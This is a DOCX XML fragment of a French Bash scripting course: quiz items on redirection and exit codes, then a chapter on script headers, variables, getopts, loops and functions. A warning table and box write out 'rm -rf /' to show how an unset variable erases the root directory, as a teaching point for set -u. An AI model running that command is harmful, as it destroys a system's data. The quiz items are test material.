      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La charge (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>load average</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) élevée avec un processeur peu utilisé indique souvent une attente d'entrées-sorties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>etime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donne l'ancienneté du processus : un processus récent et gourmand est souvent le déclencheur.</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Comment rediriger uniquement les erreurs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&gt; fichier</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2&gt; fichier</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&amp;&gt; fichier</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&lt; fichier</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>commande | grep erreur</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Écrit dans un fichier</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Filtre la sortie de la commande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Redirige les erreurs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Répète la commande</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 xml:space="preserve">Pourquoi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uniq -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exige-t-il un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> préalable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Pour la vitesse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Parce qu'il ne compare que les lignes adjacentes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Pour éviter les erreurs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Ce n'est pas nécessaire</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 signifie un code de retour 0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Une erreur</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Un succès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Une pause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Rien</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Quelle commande affiche la fin d'un fichier en direct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head -f</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tail -f</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cat -f</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less -f</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Le flux 2 est celui de l'erreur standard.</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Le tube envoie la sortie standard dans l'entrée de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Deux lignes identiques non adjacentes sont comptées séparément.</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En Unix, 0 indique le succès ; toute autre valeur indique un échec.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tail -f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suit les nouvelles lignes au fur et à mesure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>49. Scripts shell et automatisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Transformer une suite de commandes en outil fiable, testé et documenté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 48</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Écrire un script robuste en Bash.</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Gérer variables, arguments et valeurs par défaut.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Contrôler les erreurs et les interruptions.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Tester un script avant de l'utiliser en production.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Savoir quand choisir un langage plutôt que le shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>49.1 L'en-tête d'un script fiable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un script sans en-tête échoue de la pire façon : il continue après une erreur. Trois options et une vérification d'interpréteur suffisent à éviter la majorité des incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six lignes qui évitent des heures de débogage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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>#</w:t>
        <w:br/>
        <w:t># sauvegarde.sh — sauvegarde quotidienne de l'application</w:t>
        <w:br/>
        <w:t># Usage : ./sauvegarde.sh &lt;destination&gt;</w:t>
        <w:br/>
        <w:t>#</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:t>IFS=$'\n\t'</w:t>
        <w:br/>
        <w:br/>
        <w:t># set -e : arrêt à la première erreur</w:t>
        <w:br/>
        <w:t># set -u : erreur sur variable non définie</w:t>
        <w:br/>
        <w:t># set -o pipefail : erreur dans un tube propagée</w:t>
        <w:br/>
        <w:t># IFS      : évite les découpages surprenants des noms de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.169 — Quatre options et leur conséquence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08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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Sans elle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Arrêt sur erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le script continue après un échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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-u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Erreur sur variable vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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rm -rf /$DOSSIER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> devient </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rm -rf /</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-o pipefail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code de retour du tube</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un échec intermédiaire est ignoré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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-x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Trace d'exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Utile en débogage uniquement</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LA VARIABLE VIDE QUI EFFACE UN DISQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rm -rf "$DOSSIER/"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DOSSIER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> vide supprime la racine. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>set -u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et les guillemets autour de chaque variable sont des protections, pas des ornements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>49.2 Variables et arguments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un script reçoit des arguments positionnels et des options. Les valeurs par défaut, la validation et l'aide intégrée distinguent un script personnel d'un outil utilisable par d'autres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Dix opérations sur les variables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nom="rapport"                 # affectation sans espaces</w:t>
        <w:br/>
        <w:t>readonly VERSION="1.2.0"</w:t>
        <w:br/>
        <w:t>declare -i compteur=0</w:t>
        <w:br/>
        <w:br/>
        <w:t>echo "Argument 1 : ${1:-absent}"</w:t>
        <w:br/>
        <w:t>echo "Nombre d'arguments : $#"</w:t>
        <w:br/>
        <w:t>echo "Tous : $@"</w:t>
        <w:br/>
        <w:t>echo "Nom du script : $0"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Valeur par défaut et substitution</w:t>
        <w:br/>
        <w:t>: "${DESTINATION:=/var/backups}"</w:t>
        <w:br/>
        <w:t>echo "Destination : $DESTINATION"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Longueur et sous-chaîne</w:t>
        <w:br/>
        <w:t>chaine="abcdef"</w:t>
        <w:br/>
        <w:t>echo "${#chaine}"        # 6</w:t>
        <w:br/>
        <w:t>echo "${chaine:2:3}"     # cde</w:t>
        <w:br/>
        <w:t>echo "${chaine%.*}"      # retire la plus courte extension</w:t>
        <w:br/>
        <w:t>echo "${chaine##*/}"     # retire le plus long préfixe de chemin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des options propres et une aide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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:br/>
        <w:t>usage() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cat &lt;&lt;'EOF'</w:t>
        <w:br/>
        <w:t>Usage: sauvegarde.sh [-d destination] [-r rétention] source</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  -d  répertoire de destination (défaut : /var/backups)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -r  nombre de jours conservés (défaut : 7)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -h  affiche cette aide</w:t>
        <w:br/>
        <w:t>EOF</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>while getopts ":d:r:h" option; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  case "$option" in</w:t>
        <w:br/>
        <w:t xml:space="preserve">    d) destination="$OPTARG" ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r) retention="$OPTARG" ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    h) usage; exit 0 ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    :) echo "Option -$OPTARG requiert une valeur" &gt;&amp;2; exit 2 ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    \?) echo "Option inconnue : -$OPTARG" &gt;&amp;2; usage &gt;&amp;2; exit 2 ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  esac</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:br/>
        <w:t>source_dir="${1:-}"</w:t>
        <w:br/>
        <w:t>[[ -d "$source_dir" ]] || { echo "Source invalide : $source_dir" &gt;&amp;2; exit 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</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CODE DE RETOUR CONVENTIONNEL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0 pour un succès, 1 pour une erreur générique, 2 pour un usage incorrect, 126 pour un fichier non exécutable, 127 pour une commande introuvable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>49.3 Structures de contrôle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bash possède les structures attendues, avec une syntaxe qui surprend. Les guillemets et les doubles crochets sont la principale source d'erreurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Conditions et tests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Condition : [[ ]] est plus sûr que [ ]</w:t>
        <w:br/>
        <w:t>if [[ -f "$fichier" &amp;&amp; -r "$fichier" ]]; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "fichier lisible"</w:t>
        <w:br/>
        <w:t>elif [[ -d "$fichier" ]]; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "c'est un répertoire"</w:t>
        <w:br/>
        <w:t>else</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "introuvable" &gt;&amp;2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exit 1</w:t>
        <w:br/>
        <w:t>fi</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparaisons numériques</w:t>
        <w:br/>
        <w:t>[[ "$a" -gt "$b" ]]      # supérieur</w:t>
        <w:br/>
        <w:t>[[ "$a" -eq "$b" ]]      # égal</w:t>
        <w:br/>
        <w:t>[[ "$a" -ne "$b" ]]      # différent</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparaisons de chaînes</w:t>
        <w:br/>
        <w:t>[[ "$a" == "$b" ]]</w:t>
        <w:br/>
        <w:t>[[ -z "$a" ]]            # vide</w:t>
        <w:br/>
        <w:t>[[ -n "$a" ]]            # non vide</w:t>
        <w:br/>
        <w:t>[[ "$a" =~ ^[0-9]+$ ]]   # expression régulière</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre boucles différentes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Boucle sur des lignes, pas sur des mots</w:t>
        <w:br/>
        <w:t>while IFS= read -r ligne; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Traitement : $ligne"</w:t>
        <w:br/>
        <w:t>done &lt; liste.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t># Boucle sur un tableau</w:t>
        <w:br/>
        <w:t>serveurs=("web1" "web2" "db1")</w:t>
        <w:br/>
        <w:t>for serveur in "${serveurs[@]}"; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Vérification de $serveur"</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:br/>
        <w:t># Boucle numérique</w:t>
        <w:br/>
        <w:t>for i in {1..5}; do echo "Itération $i"; done</w:t>
        <w:br/>
        <w:br/>
        <w:t># Jusqu'à réussite</w:t>
        <w:br/>
        <w:t>tentative=0</w:t>
        <w:br/>
        <w:t>until curl -sf http://localhost:8080/health; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tentative=$((tentative + 1))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  [[ $tentative -ge 30 ]] &amp;&amp; { echo "Échec" &gt;&amp;2; exit 1; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sleep 2</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for ligne in $(cat fichier)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> découpe sur les espaces et casse sur les noms contenant des espaces. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>while IFS= read -r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lit réellement ligne par ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>49.4 Fonctions et réutilisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une fonction regroupe une logique nommée. Elle renvoie un code de retour, et communique un résultat par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, ce qui permet de l'utiliser dans une substitution de commande.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois fonctions réutilisables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log() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  local niveau="$1"; shift</w:t>
        <w:br/>
        <w:t xml:space="preserve">  printf '%s [%s] %s\n' "$(date -Iseconds)" "$niveau" "$*" &gt;&amp;2</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>requiert() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  command -v "$1" &gt;/dev/null 2&gt;&amp;1 || {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    log "ERREUR" "commande requise absente : $1"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return 127</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>retry() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  local essais="$1"; shift</w:t>
        <w:br/>
